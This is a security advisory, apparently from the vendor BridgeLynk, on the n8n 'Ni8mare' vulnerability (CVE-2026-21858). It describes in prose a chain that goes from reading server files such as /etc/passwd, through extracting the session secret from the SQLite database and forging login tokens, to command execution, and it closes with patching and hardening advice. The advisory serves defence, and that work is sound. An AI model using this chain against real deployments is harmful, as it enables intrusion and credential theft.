In this article
Overview
n8n is a widely adopted open-source AI workflow automation platform used by organisations to connect applications, automate processes, and build AI-powered pipelines. A critical vulnerability — dubbed 'Ni8mare' by its discoverer, security researcher Dor Attias of Cyera — has been identified in versions 1.65.0 through 1.120.x. Tracked as CVE-2026-21858 with a maximum CVSS score of 10.0, the flaw enables an unauthenticated remote attacker to read arbitrary files on the underlying server, extract sensitive credentials, and escalate into full remote code execution. A patch is available in version 1.121.0 and organisations should upgrade immediately.
Vulnerability Summary
CVE: CVE-2026-21858 | CVSS Score: 10.0 (Critical) | CVSSv3.1: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N | MITRE ATT&CK: TA0002 – Execution / T1674 – Input Injection | Affected Versions: >= 1.65.0 and < 1.121.0 | Fixed Version: 1.121.0 The vulnerability is rooted in insufficient sanitisation and improper handling of file uploads in n8n's webhook processing logic, specifically in the HTTP header Content-Type field when set to multipart/form-data. Because no authentication is required to interact with publicly exposed n8n workflows, any remote attacker who can reach the service can exploit this flaw.
How the Attack Works
Exploitation of Ni8mare follows a clear and dangerous escalation path. In the first stage, an attacker manipulates the req.body.files variable within a vulnerable form-based workflow. By pointing this variable to any file readable by the server process — such as /etc/passwd — and interacting with n8n's built-in chat interface, the attacker can directly retrieve the file's contents. In the second stage, the same technique is used to extract the n8n SQLite database, which stores usernames, email addresses, hashed passwords, and the secret key n8n uses to generate cookie session tokens. Armed with this secret key, an attacker can forge a valid session token for any user account on the platform, enabling full privilege escalation without needing to crack a single password. In the third and final stage, once authenticated to the n8n server, the attacker creates a workflow containing an Execute Command node — a legitimate n8n feature — to run arbitrary operating system commands on the underlying server, completing the chain from unauthenticated file read to full remote code execution.
Mitigation Strategies
There is no known workaround for this vulnerability. The only effective remediation is to upgrade to n8n version 1.121.0 or later, which contains the official patch. Beyond patching, BridgeLynk recommends the following defensive measures for organisations running n8n or similar webhook-enabled workflow engines: 1. Do not expose your n8n instance directly to the internet. Where internet access is operationally necessary, place the service behind an authenticated reverse proxy, web application firewall (WAF), or VPN. 2. Implement authentication controls on sensitive workflow endpoints. Workflows that handle file uploads or interact with AI knowledge bases should require credential verification before execution. 3. Conduct a security audit of your n8n deployment and all connected workflow engines. Review which workflows are publicly accessible and assess the data they can reach. 4. Monitor for anomalous process execution on hosts running n8n, particularly any child processes spawned by the n8n service that interact with system files or network connections.
How BridgeLynk Can Help
AI automation tools are rapidly becoming central to how organisations operate — and as adoption grows, so does the attack surface. BridgeLynk works with organisations to assess the security posture of AI and automation tooling, identify exposed attack surfaces before adversaries do, and implement controls that reduce risk without slowing down operations. Speak to our team to learn how we can support your organisation's security maturity and resilience against emerging threats like Ni8mare.
Our Articles
